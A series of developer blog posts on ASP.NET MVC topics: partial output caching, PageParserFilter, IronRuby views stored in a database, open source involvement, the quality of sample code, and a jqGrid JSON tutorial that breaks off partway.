A while back, I wrote about Donut Caching in ASP.NET MVC for the scenario where you want to cache an entire view except for a small bit of it. The more technical term for this technique is probably “cache substitution” as it makes use of the Response.WriteSubstitution method, but I think “Donut Caching” really describes it well — you want to cache everything but the hole in the middle.

However, what happens when you want to do the inverse? Suppose you want to cache the donut hole instead of the donut?


I think we should nickname all of our software concepts after tasty food items, don’t you agree?

In other words, suppose you want to cache a portion of the view in a different manner (for example, with a different duration) than the entire view? It hasn’t been exactly clear how to do this with ASP.NET MVC.

For example, the Html.RenderPartial method ignores any OutputCache directives on the view user control. If you happen to use Html.RenderAction from MVC Futures which attempts to render the output from an action inline within another view, you might run into this bug in which the entire view is cached if the target action has an OutputCacheAttribute applied.

I did a little digging into this today and it turns out that when you specify the OutputCache directive on a control (or page for that matter), the output caching is not handled by the control itself. Rather, it appears that the compilation system for ASP.NET pages kicks in, interprets that directive, and does the necessary gymnastics to make it work.

In plain English, this means that what I’m about to show you will only work for the default WebFormViewEngine, though I have some ideas on how to get it to work for all view engines. I just need to chat with the members of the ASP.NET team who really understand the deep grisly guts of ASP.NET to figure it out exactly.

With the default WebFormViewEngine, it’s actually pretty easy to get partial output cache working. Simply add a ViewUserControl declaratively to a view and put your call to RenderAction or RenderPartial inside of that ViewUserControl. If you’re using RenderAction, you’ll need to remove the OutputCache attribute from the action you’re pointing to.

Keep in mind that ViewUserControls inherit the ViewData of the view they’re in. So if you’re using a strongly typed view, just make the generic type argument for ViewUserControl have the same type as the page.

If that last paragraph didn’t make sense to you, perhaps an example is in order. Suppose you have the following controller action.

public ActionResult Index() {
  var jokes = new[] { 
    new Joke {Title = "Two cannibals are eating a clown"},
    new Joke {Title = "One turns to the other and asks"},
    new Joke {Title = "Does this taste funny to you?"}
  };

  return View(jokes);
}

And suppose you want to produce a list of jokes in the view. Normally, you’d create a strongly typed view and within that view, you’d iterate over the model and print out the joke titles.

We’ll still create that strongly typed view, but that view will contain a view user control in place of where we would have had the code to iterate the model (note that I omitted the namespaces within the Inherits attribute value for brevity).

<%@ Page Language="C#" Inherits="ViewPage<IEnumerable<Joke>>" %>
<%@ Register Src="~/Views/Home/Partial.ascx" TagPrefix="mvc" TagName="Partial" %>
<mvc:Partial runat="server" />

Within that control, we do what we would have done in the main view and we specify the output cache values. Note that the ViewUserControl is generically typed with the same type argument that the view is, IEnumerable<Joke>. This allows us to move the exact code we would have had in the view to this control. We also specify the OutputCache directive here.

<%@ Control Language="C#" Inherits="ViewUserControl<IEnumerable<Joke>>" %>
<%@ OutputCache Duration="10000" VaryByParam="none" %>

<ul>
<% foreach(var joke in Model) { %>
    <li><%= Html.Encode(joke.Title) %></li>
<% } %>
</ul>

Now, this portion of the view will be cached, while the rest of your view will continue to not be cached. Within this view user control, you could have calls to RenderPartial and RenderAction to your heart’s content.

Note that if you are trying to cache the result of RenderPartial this technique doesn’t buy you much unless the cost to render that partial is expensive.

Since the output caching doesn’t happen until the view rendering phase, if the view data intended for the partial view is costly to put together, then you haven’t really saved much because the action method which provides the data to the partial view will run on every request and thus recreate the partial view data each time.

In that case, you want to hand cache the data for the partial view so you don’t have to recreate it each time. One crazy idea we might consider (thinking out loud here) is to allow associating output cache metadata to some bit of view data. That way, you could create a bit of view data specifically for a partial view and the partial view would automatically output cache itself based on that view data.

This would have to work in tandem with some means to specify that the bit of view data intended for the partial view is only recreated when the output cache is expired for that partial view, so we don’t incur the cost of creating it on every request.
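Purely as a thought experiment, the API shape might be something like this (nothing like this exists today; every name here is made up):

// Imaginary API: attach cache metadata to a view data entry so the
// partial that consumes it output caches itself, and the entry is
// only recreated once that cache expires.
ViewData.Add("jokes", jokes, new PartialCachePolicy { Duration = 100 });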

In the RenderAction case, you really do get all the benefits of output caching because the action method you are rendering inline won’t get called from the view if the ViewUserControl is outputcached.

I’ve put together a small demo which demonstrates this concept in case the instructions here are not clear enough. Enjoy!


A while back a young developer emailed me asking for advice on what it takes to become a successful developer. I started to respond,

I don’t know. Why don’t you go ask a successful developer?

But then I thought, that’s kind of snarky, isn’t it? And who am I kidding with all that false modesty? After all, the concept of a “clever hack” was named after me, but the person who came up with it didn’t have 1/10 of my awesomeness, which is exceedingly apparent given the off-by-one error that dropped one of the “a”s from the phrase when it was coined. This, of course, was all before I invented TDD, the Internet, and breathing air.

(note to the humor impaired, I didn’t really invent TDD)

But as I’m apt to do, I digress…

I started thinking about the question a bit and said to myself, “If I were a successful developer, what would I have done to become that?” As I started brainstorming ideas, one thing that really stood out was joining an open source project.

If one thing in my career has paid dividends, it was getting involved with open source projects. It exposed me to such a diverse set of problems and technologies that I wouldn’t normally get a chance to work on at work.

Now before I go further, this post is not the post where I answer the young developer’s question. No, that’s a post for another time. I’ll probably give it some trite and pompous title like “Advice for a young developer.” I mean, c’mon! How pathetic and self absorbed is that title? “Get over yourself!” I’ll say to the mirror. But the guy in the mirror will probably do it anyways, but in reverse.

No, this is not that post. Rather, this post is a digression from that post, because if I’m good at one thing, it’s digressing.

As I thought about the open source thing, I got to thinking about the first open source project I ever worked on – RSS Bandit (w00t w00t!). RSS Bandit is a kick butt RSS aggregator developed by Dare Obasanjo and Torsten Rendelmann. I had just started to get into blogging at the time and was really impressed by Dare’s outspoken and yet very thoughtful blog as well as by his baby at the time, RSS Bandit (he has a real baby now, congrats man!).

I hadn’t done much Windows client development back then. I was mostly building web applications in classic ASP and then early versions of ASP.NET. I figured that it would be exciting to cut my teeth on RSS Bandit and learn Winforms development in the process. The idea of a stateful programming model had me positively giddy with excitement. This was going to be so cool.

Many new developers approaching an open source project have grand visions of implementing shiny amazing new features that will have the crowds roaring, the President naming a holiday after you, and all your enemies realizing the errors of their ways and naming their children after you.

But a good contributor swallows his or her pride and starts off slowly with something smaller in scope and more akin to grunt work. Most OSS projects have a real need for documentation, partly because all the glamour is in implementing features, so nobody wants to write the documentation.

That’s where I started. I wrote an article for the docs on getting started with RSS Bandit. Dare took notice and asked if I would contribute to the documentation, which I gladly agreed to do. He gave me commit access (I believe I was the third after Dare and Torsten to get commit rights) and I started working very hard on the documentation. In fact, much of what I wrote is still there, as you can see from the narcissistic application screenshots I used. ;)

Over time, I gained more and more trust and was allowed to work on some bug fixes and features. My first main feature was implementing configurable keyboard shortcuts, which was really neat to implement.

(A bit of trivia. I worked with these guys for years on RSS Bandit, but never met Dare in person until this past Mix conference in Las Vegas. Seriously! I’ve yet to meet Torsten who lives in Germany.)

I really loved working on RSS Bandit and it became quite a hobby that took up what little was left of my free time. I guess you could say it kept me out of gangs in the hard streets of Los Angeles, not that I tried to join nor would they accept me. Over time though, I learned something. Despite all that initial giddiness over finally getting to program in a stateful environment…

I realized I didn’t like it.

In fact, I found it quite foreign and challenging. I kept running into weird problems where controls retained their previous state after a user clicked a button. I would think to myself, “why do I have to clear that state myself? Why doesn’t it just go away when the user takes an action?” I realized my problem was that I was thinking like a web programmer, not a client programmer who took these things for granted.

As challenging as a client programmer finds the web, where you have to recreate the state on each request because the web is stateless, a developer who primarily programs the web sometimes finds client development challenging because the state is like that ugly sidekick next to the hot one at a bar – it…just…won’t…go…away.

I realized then, that I’m just a web developer at heart and I’d rather make web, not war. It was around that time that I started the Subtext project where I felt more in my element working on a web application. Eventually, I stopped using RSS Bandit preferring a web based solution in Google Reader, ironically, because the state of my feeds is always there, in the cloud, without me needing to synchronize or install an app when I’m at a new computer.

So while I actually like (or maybe am just accustomed to) the stateless programming model of the web, I’m also attracted to the statefulness of web applications as a whole in that the state of my data is not tied to any one machine but it’s stored centrally where I can easily get to it from anywhere (which yes, has its own concerns and problems such as when the net is down).

At the same time, I do check in now and then to see how RSS Bandit is progressing. There are very cool features that it has that I miss out on with Google Reader such as the ability to comment directly from the aggregator via the Comment API and the ability to subscribe to authenticated feeds. And I think Dare’s taking RSS Bandit into compelling new directions.

All this is to say that if you want to become a better developer, join an open source project (such as this one :) because it might just show you exactly what type of developer you are at heart. As I learned, I’m a web developer at heart.


As I’m sure you know, we developers are very particular people and we like to have things exactly our way. How else can you explain the long-winded, impassioned debates over curly brace placement?

So it comes as no surprise that developers really care about what goes in (and behind) their .aspx files, whether they be pages in Web Forms or views in ASP.NET MVC.

For example, some developers are adamant that a page should not include server side script blocks, while others don’t want their views to contain Web Form controls. Wouldn’t it be great if you could have your views reject such code constructs?

Fortunately, ASP.NET is full of lesser known extensibility gems which can help in such situations such as the PageParseFilter. MSDN describes this class as such:

Provides an abstract base class for a page parser filter that is used by the ASP.NET parser to determine whether an item is allowed in the page at parse time.

In other words, implementing this class allows you to go along for the ride as the page parser parses the .aspx file and gives you a chance to hook into that parsing.

For example, here’s a very simple filter which blocks any script tags with the runat="server" attribute set within a page.

using System;
using System.Web.UI;

public class MyPageParserFilter : PageParserFilter {
  public override bool ProcessCodeConstruct(CodeConstructType codeType
    , string code) {
    if (codeType == CodeConstructType.ScriptTag) {
      throw new InvalidOperationException("Say NO to server script blocks!");
    }
    return base.ProcessCodeConstruct(codeType, code);
  }

  public override bool AllowCode {
    get {
      return true;
    }
  }

  public override bool AllowControl(Type controlType, ControlBuilder builder)   {
    return true;
  }

  public override bool AllowBaseType(Type baseType) {
    return true;
  }

  public override bool AllowServerSideInclude(string includeVirtualPath) {
    return true;
  }

  public override bool AllowVirtualReference(string referenceVirtualPath
    , VirtualReferenceType referenceType) {
    return true;
  }

  public override int NumberOfControlsAllowed {
    get {
      return -1;
    }
  }

  public override int NumberOfDirectDependenciesAllowed {
    get {
      return -1;
    }
  }
}

Notice that we had to override some defaults for other properties we’re not interested in such as NumberOfControlsAllowed or we’d get the default of 0 which is not what we want in this case.

To apply this filter, just specify it in the <pages /> section of web.config like so:

<pages pageParserFilterType="Namespace.MyPageParserFilter, AssemblyName" />

Applying a parse filter for Views in ASP.NET MVC is a bit trickier because it already has a parse filter registered, ViewTypeParserFilter, which handles part of the voodoo black magic in order to remove the need for code-behind in views when using a generic model type. Remember those particular developers I was talking about?

Suppose we want to prevent developers from using server controls which make no sense in the context of an ASP.NET MVC view. Ideally, we could simply inherit from ViewTypeParserFilter and make our change so we don’t lose the existing view functionality.

That type is internal so we can’t simply inherit it. Fortunately, what we can do is simply grab the ASP.NET MVC source code for that type, rename the type and namespace, and then change it to meet our needs. Once we’re done, we can even share those changes with others. This is one of the benefits of having an open source license for ASP.NET MVC.

WARNING: The fact that we implement a ViewTypeParserFilter is an implementation detail. The goal is that in the future, we wouldn’t need this filter to provide the nice generic syntax. So what I’m about to show you might be made obsolete in the future and should be done at your own risk. It’s definitely running with scissors.

In my demo, I copied the following files to my project:

  • ViewTypeParserFilter
  • ViewTypeControlBuilder
  • ViewPageControlBuilder
  • ViewUserControlControlBuilder

I then created a new parser filter which inherits from the copied ViewTypeParserFilter and overrides the AllowControl method like so:

public override bool AllowControl(Type controlType, ControlBuilder builder) {
  return (controlType == typeof(HtmlHead) 
    || controlType == typeof(HtmlTitle)
    || controlType == typeof(ContentPlaceHolder)
    || controlType == typeof(Content)
    || controlType == typeof(HtmlLink));
}

This will block adding any control except for those necessary in creating a typical view. You can imagine adding an easy way to configure that list in case you later need to allow other controls, as sketched below.
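If you wanted that configurability, one lightweight approach (a sketch of my own, not part of the demo; the appSettings key name here is made up) is to read the allowed type names from configuration:

using System;
using System.Configuration;
using System.Linq;

public static class AllowedControls {
  // Hypothetical helper: reads a semicolon-delimited list of allowed control
  // type names from an appSettings entry named "allowedViewControls".
  public static bool IsAllowed(Type controlType) {
    string setting =
      ConfigurationManager.AppSettings["allowedViewControls"] ?? "";
    return setting.Split(';').Contains(controlType.FullName);
  }
}

The AllowControl override could then delegate to this helper instead of hard-coding the list.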

Once we’ve implemented this new filter, we can edit the Web.config file within the Views directory to set the parser filter to this one.

This is a powerful tool for hooking into the parsing of a web page, so do be careful with it. As you might expect, I have a very simple demo of this feature here.

comments edit

At long last, the book that I worked on with Scott Hanselman, Rob Conery, and Scott Guthrie is in stock at Amazon.com.

To commemorate the book being available, the two Scotts worked very hard to convert the free eBook of chapter 1 (the end-to-end walkthrough) from the PDF into a series of HTML articles.

This is a great series which walks through the construction of the NerdDinner website. It touches upon most of the day-to-day aspects of ASP.NET MVC that you’ll want to know. It’s a great way to start understanding how the pieces largely fit together.

The rest of the book is for those who want to drill deep into the details of how the framework works. We tried to pepper the book with notes and anecdotes from the product team in a style similar to the annotations in the Framework Design Guidelines book. If you’re looking for reasons not to buy the book, see Rob’s post.

extended-forehead-edition

The bad news is that despite our heroic efforts, in which we cajoled, begged, pleaded, and rent our clothes asunder, we were not able to convince our editors to produce a special platinum extended forehead edition of the book. I really thought we could charge extra for the limited edition cover and make out like gangbusters. I’ll just post it here so you can see for yourself. Click on it for a larger view.

code, asp.net mvc, dlr comments edit

Say you’re building a web application and you want, against your better judgment perhaps, to allow end users to easily customize the look and feel – a common scenario within a blog engine or any hosted application.

With ASP.NET, view code tends to be some complex declarative markup stuck in a file on disk which gets compiled by ASP.NET into an assembly. Most system administrators would first pluck out their own toenail rather than allow an end user permission to modify such files.

It’s possible to store such files in the database and use a VirtualPathProvider to load them, but that requires your application (and thus their views) to run in full trust. Is there a way you could safely store such views in the database in an application running in medium trust where the code in the view is approachable?

At the ALT.NET conference a little while back, Jimmy Schementi and John Lam gave a talk about the pattern of hosting a scripting language within a larger application. For example, many modern 3-D games have their high-performance core engine written in C++ and assembly. However, these games often use a scripting language, such as Lua, to write the scripts for the behaviors of characters and objects.

An example that might be more familiar to most people is the use of VBA to write macros for Excel. In both of these cases, the larger application hosts a scripting environment that allows end users to customize the application using a simpler, lighter-weight language than the one the core app is written in.

A long while back, I wrote a blog post about defining ASP.NET MVC Views in IronRuby, followed by a full IronRuby ASP.NET MVC stack. While there was some passionate interest from a few, in general I was met with the thunderous sound of crickets. Why the huge lack of interest? Probably because I didn’t really sell the benefit or explain the pain it solves. I’m sure many of you were asking: Why bother? What’s in it for me?

After thinking about it some more, I realized that my prototypes appeared to suggest that if you want to take advantage of IronRuby, you would need to make some sort of wholesale switch to a new foreign language, not something to be undertaken lightly.

This is why I really like Jimmy and John’s recent efforts to focus on showing the benefits of hosting the DLR for scripting scenarios like the ones mentioned above. It makes total sense to me when I look at it in this perspective. The way I see it, most developers spend a huge bulk of their time in a single core language, typically their “language of choice”. For me, I spend the bulk of my time writing C# code.

However, I don’t think twice about the fact that I also write tons of JavaScript when I do web development, and I’ll write the occasional VB code when I need a new Macro for Visual Studio or Excel. I also write SQL when I need to. I’m happy to pick up and use a new language when it will enable me to do the job at hand more efficiently and naturally than C# does. I imagine many developers feel this way. The occasional use of a scripting languages is fine when it gets the job done and I can still spend most of my time in my favorite language.

So I started thinking about how that might work in a web application. What if you could write all your business logic and controller logic in your language of choice, but have your views written in a lightweight scripting language? If my web application were to host a scripting engine, I could store the view code in any medium I want, such as the database. Having views in the database makes it very easy for end users to modify them, since it wouldn’t require file upload permissions into the web root.
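To make the hosting idea concrete, here’s roughly what the core of the pattern looks like in C#. This is a simplified sketch of my own, not the prototype’s actual code, and it assumes you’ve referenced the IronRuby and DLR hosting assemblies:

using IronRuby;
using Microsoft.Scripting.Hosting;

public class RubyScriptRunner {
  // Runs a Ruby snippet (which could be loaded from a database)
  // against a model object supplied by the host application.
  public object Run(string rubyCode, object model) {
    ScriptEngine engine = Ruby.CreateEngine();
    ScriptScope scope = engine.CreateScope();
    scope.SetVariable("model", model); // expose host data to the script
    return engine.Execute(rubyCode, scope);
  }
}

A real view engine would layer ERB-style template parsing and output buffering on top of this, but the engine/scope/execute flow is the essence of hosting the DLR.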

This is where hosting the DLR is a nice fit. I put together a proof of concept for these ideas. This is just a prototype intended to show how such a workflow might work. In this prototype, you go about creating your models and controllers the way you normally would.

For example, here’s a controller that returns some structured data to the view in the form of an anonymous type.

public ActionResult FunWithScripting()
{
  var someData = new { 
    salutation = "Are you having fun with scripting yet?", 
    theDate = DateTime.Now,
    numbers = new int[] { 1, 2, 3, 4 } 
  };

  return View(someData);
}

Once you write your controller, but before you create your view, you compile the app and then go visit the URL.

View does not exist

We haven’t created the view yet, so let’s follow the instructions and login. Afterwards, we this:

view editor

Since the view doesn’t exist, I hooked in and provided a temporary view for the controller action which contains a view editor. Notice that at the bottom of the screen, you can see the current property names and values being passed to the view. For example, there’s an enumeration of integers as one property, so I was able to use the Ruby each method to print them out in the view.

The sweet little browser-based source code editor is EditArea, created by Christophe Dolivet. Unfortunately, at the time of this writing, it doesn’t yet support an ERB-style syntax highlighting scheme. That’s why the <% and %> aren’t highlighted in yellow.

When I click Create View, I get taken back to the request for the same action, but now I can see the view I just created (click to enlarge).

Fun with scripting

In the future, I should be able to host C# views in this way. Mono already has a tool for dynamically compiling C# code passed in as a string, which I could try to incorporate.
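For the curious, the standard CodeDom APIs in the framework can already do something along these lines. Here’s a hedged sketch (error handling omitted) of compiling a C# snippet held in a string into an in-memory assembly:

using System.CodeDom.Compiler;
using Microsoft.CSharp;

public static class StringCompiler {
  // Compiles C# source code held in a string into an in-memory assembly.
  public static CompilerResults Compile(string source) {
    var provider = new CSharpCodeProvider();
    var options = new CompilerParameters { GenerateInMemory = true };
    options.ReferencedAssemblies.Add("System.dll");
    return provider.CompileAssemblyFromSource(options, source);
  }
}

Whether this would perform well enough for per-request view compilation is an open question; caching the compiled assemblies would almost certainly be necessary.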

I’m seriously thinking of making this the approach for building skins in a future version of Subtext. That would make skin installation drop dead simple and not require any file directory access. Let me know if you make use of this technique in your applications.

If you try and run this prototype, please note that there are some quirky caching issues with editing existing views in the prototype. It’ll seem like your view is not being edited, but it’s a result of how views are being cached. It might take a bit of time before your edits show up. I’m sure there are other bugs I’m still in the process of fixing. But for the most part, the general principle is sound.

You can download the prototype here.

comments edit

Because of all the travel I did last year, as well as the impending new addition to the family this year, I drastically cut down on my travel this year. There are only two conferences outside of Redmond I planned to speak at: one was Mix (see the links to videos of my talks), and the next one is the Norwegian Developer Conference, also known as the NDC.

NDC_logo-2009

Hanselman spoke at this conference last year and tells me it’s a good one. Besides, it’s in Norway! I travelled through Norway once during college, taking a train from Oslo to Bergen, riding a boat on the fjords, and enjoying the profound natural beauty of the country. I guess I have a thing for cold places. :)

I’m pretty excited about the speaker line-up which includes a lot of great .NET and ALT.NET speakers you know and love. But what’s really got me perked up are the speakers outside of the typical .NET conference lineup.

One of my favorite conferences last year was Google IO which was a refreshing change of pace for me. For the NDC, I requested to stay an extra day so I could make sure to catch sessions by Mary Poppendieck, Robert “Uncle Bob” Martin, and Michael Feathers among others.

It looks like all my talks are on Day 1 of the conference. I’ll be updating my Black Belt Ninja Tips ASP.NET MVC talk, talking about Ajax in the context of ASP.NET MVC, and giving a joint talk with Scott Hanselman, which we’re still figuring out the exact details on.

My only concern is whether I need to worry if Jeremy Miller is going to try and express his man love for me while there. ;) Kidding aside, I’m approaching with a mind ready to absorb knowledge. If you’re in the area, definitely consider this as a conference to check out. It should be fun!

comments edit

What responsibility do we have as software professionals when we post code out there for public consumption?

I don’t have a clear cut answer in my mind, but maybe you can help me formulate one. :)

For example, I recently posted a sample on my blog intended to show how to use jQuery Grid with ASP.NET MVC.

The point of the sample was to demonstrate shaping a JSON result for the jQuery grid’s consumption. For the sake of illustration, I wanted the action method to be relatively self contained so that a reader would quickly understand what’s going on in the code without having to jump around a lot.

Thus the code takes some shortcuts with data access, lack of exception handling, and lack of input validation. It’s pretty horrific!

Now before we grab the pitchforks (and I did say “we” intentionally as I’ll join you) to skewer me, I did preface the code with a big “warning, DEMO CODE AHEAD” disclaimer and so far, nobody’s beaten me up too bad about it, though maybe by writing this I’m putting myself in the crosshairs.

Even so, it did give me pause to post the code the way I did. Was I making the right trade-off in sacrificing code quality for the sake of blog post demo clarity and brevity?

In this particular case, I felt it was worth it as I tend to categorize code into several categories. I’m not saying these are absolutely correct, just opening up my cranium and giving you a peek in my head about how I think about this:

  • Prototype Code – Code used to hash out an idea to see if it’s feasible or as a means of learning a new technology. Often very ugly throwaway code with little attention paid to good design.
  • Demo Code – Code used to illustrate a concept, especially in a public setting. Like prototype code, solid design is sometimes sacrificed for clarity, but these sacrifices are deliberate and intentional, which is very important. My jQuery Grid demo above is an example of what I mean.
  • Sample Code – Very similar to demo code, the difference being that good design principles should be demonstrated for the code relevant to the concept the sample is demonstrating. Code irrelevant to the core concept might be fine to leave out or have lower quality. For example, if the sample is showing a data access technique, you might still leave out exception handling, caching, etc… since it’s not the goal of the sample to demonstrate those concepts.
  • Production Code – Code you’re running your business on, or selling. Should be as high quality as possible given your constraints. Sometimes, shortcuts are taken in the short run (incurring technical debt) with the intention of paying down the debt ASAP.
  • Reference Code – This is code that is intended to demonstrate the correct way to build an application and should be almost idealized in its embracement of good design practices.

As you might expect, the quality the audience might expect from these characterizations is not hard and fast, but dependent on context. For example, for the Space Shuttle software, I expect the Production Code to be much higher quality than production code for some intranet application.

Likewise, I think where the code is posted, and by whom, can affect perception. We might expect much less from some blowhard posting code to his personal blog, ummm, like this one.

Then again, if the person claims that his example is a best practice, which is a dubious claim in the first place, we may tend to hold it to much higher standards.

Now if instead of a person, the sample is posted on an official website of a large company, say Microsoft, the audience may expect a lot more than from a personal blog post. In fact, the audience may not make the distinction between sample and reference application. This appears to be the case recently with Kobe and in the past with Oxite.

Again, this is my perspective on these things. But my views have been challenged recently via internal and external discussions with many people. So I went to the fount of all knowledge where all your wildest questions are answered: Twitter. I posed the following two questions:

Do you have different quality expectations for a sample app vs a reference app?

What if the app is released by MS? Does that change your expectations?

The answers varied widely. Here’s a small sampling that represents the general tone of the responses I received.

Yes. A sample app should be quick and dirty. A reference app should exhibit best practices (error checking, logging, etc)

No, same expectations… Even I ignore what is the difference between both.

Regardless of who releases the app, my expectations don’t change.

Yes being from MS raises the bar of necessary quality, because it carries with it the weight of a software development authority.

I don’t think I have ever thought about what the difference in the two is, isn’t a sample app basically a reference app?

I don’t think most people discriminate substantively betw the words “sample” and “reference.”

Everyone, Microsoft included, should expect to be judged by everything they produce, sample or otherwise.

yes, samples do not showcase scalability or security, but ref apps do… i.e ref apps are more “enterprisey”

IMHO, sample implies a quick attempt; mostly throw-away. Ref. implies a proposed best practice; inherently higher quality.

No. We as a community should understand the difference.However MS needs to apply this notion consistently to it’s examples.

Whatever you release as sample code, is *guaranteed* to be copy-pasted everywhere - ask Windows AppCompat if you don’t believe me

Note that this is a very unscientific sampling, but there is a lot of diversity in the views being expressed here. Some people make no distinction between sample and reference while others do. Some hold Microsoft to higher standards while others hold everybody to the same standard.

I found this feedback to be very helpful because I think we tend to operate under one assumption about how our audience sees our samples, but your audience might have a completely different view. This might explain why there may be miscommunication and confusion about the community reaction to a sample.

I highlighted the last two responses because they make up the core dichotomy in my head regarding releasing samples.

On the one hand, I have tended to lean towards the first viewpoint. If code has the proper disclaimer, shouldn’t we take personal responsibility in understanding the difference?

Ever since starting work on ASP.NET MVC, we’ve been approached by more and more teams at Microsoft who are interested in sharing yet more code on CodePlex (or otherwise) and want to hear about our experiences and challenges in doing so.

When you think about it, this is a great change in what has been an otherwise closed culture. There are a lot of teams at Microsoft, and the quality and intent of the code will vary from team to team and project to project. I would hate to slow down that stream of sample code flowing out because some people will misunderstand its purpose and intent and cut and paste it. Yes, some of the code will be very bad, but some of it will still be worth putting out there. After all, I tend to think that if we stop giving the bad programmers bad code to cut and paste, they’ll simply write the bad code themselves. Yes, posting good code is even better, but I think that will be a byproduct of getting more code out there.

On the other hand, there’s the macro view of things to consider. People should also know not to use a hair dryer in the shower, yet hair dryers still carry those funny warning labels for a reason. The fact that people shouldn’t do something doesn’t change the fact that they may still do it. We can’t simply ignore that fact and the impact it may have. No matter how many disclaimers we put on our code, people will cut and paste it. It’s not so bad that a bad programmer uses bad code; the real problem is that as it propagates, the code gets confused with the right way of doing things and spreads to many programmers.

Furthermore, the story is complicated even more by the inconsistent labels applied to all this sample code, not to mention the inconsistent quality.

So What’s the Solution?

Stop shipping samples.

Nah, I’m just kidding. ;)

Some responses were along the lines of “Microsoft should just post good code.” I agree; I would really love it if every sample were of superb quality. I’d also like to play in a World Cup and fly without wings, but I don’t live in that world.

Obviously, this is what we should be striving for, but what do we do in the meantime? Stop shipping samples? I hope not.

Again, I don’t claim to have the answers, but I think there are a few things that could help. One twitter response made a great point:

a reference app is going to be grilled. Even more if it comes from the mothership. Get the community involved *before* it gets pub

Getting the community involved is a great means of having your code reviewed to make sure you’re not doing anything obviously stupid. Of course, even in this, there’s a challenge. Jeremy Miller made this great point recently:

We don’t have our own story straight yet.  We’re still advancing our craft.  By no means have we reached some sort of omega point in our own development efforts. 

In other words, even with community involvement, you’re probably going to piss someone off. But avoiding piss is not really the point anyways (though it’s much preferred to the alternative). The point is to be a participant in advancing the craft alongside the larger community. Others might disagree with some of your design decisions, but hopefully they can see that your code is well considered via your involvement with the community in the design process.

This also helps in avoiding the perception of arrogance, a fault that some feel is the root cause of why some of our sample apps are of poor quality. Any involvement with the community will help make it very clear that there’s much to learn from the community just as there is much to teach.

While I think getting the community involved is important, I’m still on the fence on whether it must happen before the code is published. After all, isn’t publishing code a means of getting community involvement in the first place? As Dare says:

getting real feedback from customers by shipping is more valuable than any amount of talking to or about them beforehand

Personally, I would love for there to be a way for teams to feel free to post samples (using the definition I wrote), without fear of misconstrued intent and bad usage. Ideally in a manner where it’s clear that the code is not meant for cut and paste into real apps.

Can we figure out a way to post code samples that are not yet the embodiment of good practices in a responsible manner with the intent to improve the code quality based on community feedback? Is this even a worthy goal or should Microsoft samples just get it right the first time, as mentioned before, or don’t post at all?

Perhaps both of those are pipe dreams. I’m definitely interested in hearing your thoughts. :)

Another question I struggle with: what causes people not to distinguish between reference apps and sample apps? Is there no distinction to make? Or is this a perception problem that could be corrected with a concerted effort to apply such labels consistently? Or via some other means?

As you can see, I have my own preconceived notions about those things, but I’m putting them out there and challenging them based on what I’ve read recently. Please do comment and let me know your thoughts.

code, asp.net mvc comments edit

Tim Davis posted an updated version of this solution on his blog. His version includes the following:

  • jqGrid 3.8.2
  • .NET 4.0 Updates
  • VS2010
  • jQuery 1.4.4
  • jQuery UI 1.8.7

Continuing in my pseudo-series of posts based on my ASP.NET MVC Ninjas on Fire Black Belt Tips Presentation at Mix (go watch it!), this post covers a demo I did not show because I ran out of time. It was a demo I held in my back pocket just in case I went too fast and needed one more demo.

A common scenario when building web user interfaces is providing a pageable and sortable grid of data. Even better if it uses AJAX to make it more responsive and snazzy. Since ASP.NET MVC includes jQuery, I figured it’d be fun to use a jQuery plugin for this demo, so I chose jQuery Grid.

After creating a standard ASP.NET MVC project, the first step was to download the plugin and to unzip the contents to my scripts directory per the Installation instructions.

jquery-grid-scripts

For the purposes of this demo, I’ll just implement this using the Index controller action and view within the HomeController.

With the scripts in place, go to the Index view and add the proper call to initialize the jQuery grid. There are three parts to this:

First, make sure to add the required script and CSS declarations.

<link rel="stylesheet" type="text/css" href="/scripts/themes/coffee/grid.css" 
  title="coffee" media="screen" />
<script src="/Scripts/jquery-1.3.2.js" type="text/javascript"></script>
<script src="/Scripts/jquery.jqGrid.js" type="text/javascript"></script>
<script src="/Scripts/js/jqModal.js" type="text/javascript"></script>
<script src="/Scripts/js/jqDnR.js" type="text/javascript"></script>

Notice that the first line contains a reference to the “coffee” CSS file. There are multiple themes included and when you choose a theme, you need to be sure to include the theme’s CSS file. I chose coffee, because I drink a lot of it.

The second step is to initialize the grid with a bit of JavaScript. This looks a bit funky if you’re not used to jQuery, but I assure you, it’s pretty straightforward.

<script type="text/javascript">
    jQuery(document).ready(function(){ 
      jQuery("#list").jqGrid({
        url:'/Home/GridData/',
        datatype: 'json',
        mtype: 'GET',
        colNames:['Id','Votes','Title'],
        colModel :[
          {name:'Id', index:'Id', width:40, align:'left' },
          {name:'Votes', index:'Votes', width:40, align:'left' },
          {name:'Title', index:'Title', width:200, align:'left'}],
        pager: jQuery('#pager'),
        rowNum:10,
        rowList:[5,10,20,50],
        sortname: 'Id',
        sortorder: "desc",
        viewrecords: true,
        imgpath: '/scripts/themes/coffee/images',
        caption: 'My first grid'
      }); 
    }); 
</script>

There are a few things you’ll have to be sure to configure here. First is the url property which points to the URL that will provide the JSON data. Notice that the value is /Home/GridData which means we’ll be implementing an action method named GridData soon. During the course of this post, we’ll change that property to point to different action methods.

The colNames property contains the display names for each column, separated by commas. Ideally, it should match up with the items in the colModel property.

The colModel property is an array that is used to configure each column of the grid, allowing you to specify the width, alignment, and sortability of a column. The index property of a column is an important one as that is the value that is sent to the server when sorting on a column.

See the documentation for more details on the HTML and JavaScript used to configure the grid.

The third step is to add a bit of HTML to the page which will house the grid.

<h2>My Grid Data</h2>
<table id="list" class="scroll" cellpadding="0" cellspacing="0"></table>
<div id="pager" class="scroll" style="text-align:center;"></div>

With this in place, it’s time to implement the GridData action method to return the JSON in the proper format.

But first, let’s take a look at the JSON format expected by the grid. From the documentation, you can see it will look something like:

{ 
  total: "xxx", 
  page: "yyy", 
  records: "zzz",
  rows : [
    {id:"1", cell:["cell11", "cell12", "cell13"]},
    {id:"2", cell:["cell21", "cell22", "cell23"]},
      ...
  ]
}

The documentation I linked to also provides some gnarly looking PHP code you can use to generate the JSON data. Fortunately, you won’t have to deal with that. By using the Json helper method with an anonymous object, we can write some relatively clean looking code which looks almost just like the spec. Here’s my first cut of the action method, just to get it to display some fake data.

public ActionResult GridData(string sidx, string sord, int page, int rows) {
  var jsonData = new {
    total = 1, // we'll implement later 
    page = page,
    records = 3, // implement later 
    rows = new[]{
      new {id = 1, cell = new[] {"1", "-7", "Is this a good question?"}},
      new {id = 2, cell = new[] {"2", "15", "Is this a blatant ripoff?"}},
      new {id = 3, cell = new[] {"3", "23", "Why is the sky blue?"}}
    }
  };
  return Json(jsonData, JsonRequestBehavior.AllowGet);
}

A couple of things to point out. The arguments to the action methods are named according to the query string parameter names that jQuery grid sends via the Ajax request. I didn’t choose those names.

